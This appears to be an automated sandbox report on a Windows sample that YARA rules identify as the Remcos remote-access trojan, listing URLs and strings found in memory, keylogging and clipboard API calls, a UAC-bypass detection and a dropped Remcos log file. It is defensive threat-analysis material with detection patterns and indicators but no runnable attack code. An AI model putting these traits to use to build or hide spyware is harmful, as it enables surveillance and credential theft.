Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
Source: Graff.exe, 00000002.00000002.3740170778.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1373773703.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1397495573.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1397075214.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000003.1371817413.0000000001420000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/
Source: Graff.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: Graff.exe, 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Graff.exe, 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, Graff.exe, 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: Graff.exe, 00000002.00000003.1396844709.00000000014B1000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000002.00000002.3741371682.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpsystem32
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.digicert.com0Q
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: Graff.exe, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: Graff.exe, Graff.exe, 00000007.00000002.1378656184.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: Graff.exe, 00000007.00000002.1378656184.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.coma
Source: Graff.exe, 00000002.00000002.3743546633.00000000073D0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Graff.exe, 00000002.00000002.3743546633.00000000073D0000.00000040.10000000.00040000.00000000.sdmp, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv4482.tmp.4.dr	String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696501260359
Source: Graff.exe, 00000004.00000002.1397336446.00000000011F4000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AF
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?ae1e93c052690ba0623cc864d4ad8ff9
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?d3f78c2c20f92f3d0890e3edc77b84b9
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: Graff.exe, 00000004.00000003.1396549131.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1396442421.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000002.1397860909.0000000002F1D000.00000004.00000020.00020000.00000000.sdmp, Graff.exe, 00000004.00000003.1396415969.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033__
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: Graff.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-10-25-17/PreSignInSettingsConfig.json?One
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=60046d
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Graff.exe, Graff.exe, 00000007.00000002.1378147317.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Graff.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv4482.tmp.4.dr	String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

2_2_004099E4

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_004159C6

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	2_2_004159C6
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	4_2_0040987A
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 4_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	4_2_004098E2
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	6_2_00406DFC
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	6_2_00406E9F
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	7_2_004068B5
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	7_2_004072B5
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	10_2_004159C6

Source: C:\Users\user\AppData\Local\misruling\Graff.exe

Code function: 2_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

2_2_004159C6

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe

Code function: 0_2_0074912D GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

0_2_0074912D

Source: C:\Users\user\Desktop\bwYw3UUfy7.exe	Code function: 0_2_007C9576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_007C9576
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_00909576 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00909576

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3741371682.000000000147B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512004348.0000000001800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512067851.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742200171.000000000406E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741598169.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3740170778.0000000001401000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3741371682.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 2_2_0041BB77 SystemParametersInfoW,		2_2_0041BB77
Source: C:\Users\user\AppData\Local\misruling\Graff.exe	Code function: 10_2_0041BB77 SystemParametersInfoW,		10_2_0041BB77

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.Graff.exe.4010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.Graff.exe.3bf0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.Graff.exe.4010000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.Graff.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 10.2.Graff.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 2.2.Graff.exe.3bf0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000A.00000002.1512305298.0000000004010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000A.00000002.1511116716.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000002.00000002.3742130594.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: Graff.exe PID: 7792, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Graff.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Binary is likely a compiled AutoIt script file

Source: bwYw3UUfy7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
